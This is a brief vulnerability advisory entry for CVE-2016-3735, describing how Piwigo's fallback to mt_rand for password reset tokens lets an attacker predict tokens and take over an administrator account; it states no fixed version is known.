CVE-2016-3735

Name of the Vulnerable Software and Affected Versions Piwigo (affected versions not specified)

Description The issue affects Piwigo, an image gallery software written in PHP. When certain criteria are not met on a host, Piwigo defaults to using mt rand to generate password reset tokens. The output of mt rand can be predicted after recovering the seed used to generate it, allowing an unauthenticated attacker to take over an account if they know an administrator's email address and can request a password reset.

Recommendations At the moment, there is no information about a newer version that contains a fix for this vulnerability.